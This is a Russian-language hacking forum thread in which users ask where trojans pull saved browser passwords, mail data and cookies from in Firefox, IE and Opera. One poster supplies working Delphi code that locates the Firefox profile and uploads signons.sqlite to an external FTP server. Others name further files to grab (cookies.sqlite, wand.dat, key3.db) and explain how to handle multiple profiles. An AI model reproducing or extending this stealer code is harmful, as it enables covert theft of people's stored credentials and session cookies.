Откуда из Браузеров Трой тянет инфу о паролях и почте?? |
31.12.2009, 00:42
|
|
Познающий
Регистрация: 20.02.2009
Сообщений: 86
С нами:
9064089
Репутация:
7
|
|
Откуда из Браузеров Трой тянет инфу о паролях и почте??
Откуда из Браузеров Трой тянет инфу о паролях и почте?? интрересуют Mozila и IE если можно название файликов и пути к ним пожалуйста
|
|
|
31.12.2009, 01:18
|
|
Постоянный
Регистрация: 20.03.2009
Сообщений: 564
С нами:
9023100
Репутация:
395
|
|
Если не в ломы напишите еще где лежат cookie в разных обозревателях.
самому лень ) (з.ы в софари не нашел нихрена)
с наступающим!!!
|
|
|
|
31.12.2009, 01:27
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
Сообщение от TikTik
Откуда из Браузеров Трой тянет инфу о паролях и почте?? интрересуют Mozila и IE если можно название файликов и пути к ним пожалуйста
Вроде как файле signons.sqlite -> сохр пароли (но не уверен)(Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\sign ons.sqlite')
Код который тырит сохр. пароли:
Код:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, IdBaseComponent, IdComponent, IdTCPConnection,
IdTCPClient, IdFTP;
type
TForm1 = class(TForm)
ListBox1: TListBox;
Edit1: TEdit;
IdFTP1: TIdFTP;
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
//На переменные которые лишние -> не обращаем внимания :)
function GetUserFromWindows: string;
var
UserName : string;
UserNameLen : Dword;
begin
UserNameLen := 255;
SetLength(userName, UserNameLen);
if GetUserName(PChar(UserName), UserNameLen) then
Result := Copy(UserName,1,UserNameLen - 1)
else
Result := 'Unknown';
end;
function GetSystemDisk: string;
var
S: array[0..MAX_PATH] of Char;
begin
GetWindowsDirectory(S,SizeOf(S));
Result:=copy(S,0,1);
end;
procedure TForm1.FormCreate(Sender: TObject);
var
User,Disc:string;
coock,st,mask:string;
f:TextFile;
i:integer;
Sf:tsearchrec;
find:integer;
Firefox:string;
FireFoxUser:string;
begin
//code by wolmer
Disc:=GetSystemDisk;
User:=GetUserFromWindows;
find:=FindFirst(Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\*',faDirectory,sf);
if find=0 then
begin
if ((Sf.Attr and faDirectory) = faDirectory) and
((Sf.Name = '.') or (Sf.Name = '..')) then
begin
Find:=FindNext(Sf);
end;
find:=FindNext(sf);
FireFoxUser:=sf.name;
end;
Firefox:= Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\signons.sqlite';
if FileExists(Firefox) then
begin
IdFTP1.Username:='123';
IdFTP1.Password:='123';
IdFTP1.Host:='ftp.narod.ru';
IdFTP1.Port:=21;
IdFTP1.Connect();
IdFTP1.Put(FireFox, 'NameFile1');
IdFTP1.Disconnect;
end;
end;
end.
Ну а куки мозила хранит в cookies.sqlite
Вот для многих будет полезная информация о том какой файл и за что отвечает в мозиле:
http://wiki.mozilla-russia.org/index.php/О%20профилях%20Mozilla%20Firefox
Последний раз редактировалось wolmer; 31.12.2009 в 04:02..
|
|
|
|
31.12.2009, 01:55
|
|
Познающий
Регистрация: 20.02.2009
Сообщений: 86
С нами:
9064089
Репутация:
7
|
|
Сообщение от wolmer
Ну а куки мозила хранит в cookies.sqlite
Вот для многих будет полезная информация о том какой файл и за что отвечает в мозиле:
http://wiki.mozilla-russia.org/index.php/О%20профилях%20Mozilla%20Firefox
cпасибо !!только не могу найти где же эти cocie.sqlite  (
там вот вычитал что есть такой cookies.txt а гдеон падлюка спрятан блиинн 
Последний раз редактировалось TikTik; 31.12.2009 в 01:58..
|
|
|
|
31.12.2009, 02:13
|
|
Участник форума
Регистрация: 20.12.2008
Сообщений: 130
С нами:
9152722
Репутация:
11
|
|
Сообщение от wolmer
Код который тырит сохр. пароли:
ну спёр ты signons.sqlite, а дальше что с ним делать?  написал бы чем расшифровывать и по-моему без key3.db ничего не сделаешь
|
|
|
|
31.12.2009, 02:15
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
Сообщение от Linkus
ну спёр ты signons.sqlite, а дальше что с ним делать? написал бы чем расшифровывать и по-моему без key3.db ничего не сделаешь Взял информацию из первого же источника в гугле, в крайнем случае ничего не мешает добавить еще одну строчку на залив файла key3.db
(чем расшифровывать -> гуглите, в крайнем случае -> офф сайт мозилы)
Последний раз редактировалось wolmer; 31.12.2009 в 03:13..
|
|
|
|
31.12.2009, 02:01
|
|
Познавший АНТИЧАТ
Регистрация: 26.11.2004
Сообщений: 1,367
С нами:
11291486
Репутация:
2175
|
|
opera = wand.dat
|
|
|
|
31.12.2009, 02:11
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
cпасибо !!только не могу найти где же эти cocie.sqlite
Не ужели их тут нету? -> Disc+':\Documents and Settings\'+User+'\Application Data\Mozilla\Firefox\Profiles\'+FireFoxUser+'\'
В основном в этом пути все хорошое/вкусное держится
|
|
|
|
31.12.2009, 03:34
|
|
Познающий
Регистрация: 20.02.2009
Сообщений: 86
С нами:
9064089
Репутация:
7
|
|
хм а имя юзера в Profile всегда разное какже путь та указывать до папочки |
|
|
|
31.12.2009, 03:52
|
|
Участник форума
Регистрация: 20.12.2008
Сообщений: 130
С нами:
9152722
Репутация:
11
|
|
Сообщение от TikTik
хм а имя юзера в Profile всегда разное какже путь та указывать до папочки читай код, приведённый wolmer'ом внимательнее
там находится первая попавшаяся папка в \Profiles, имя которой отлично от . и ..
можно для всех найденных папок реализовать, если их несколько
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
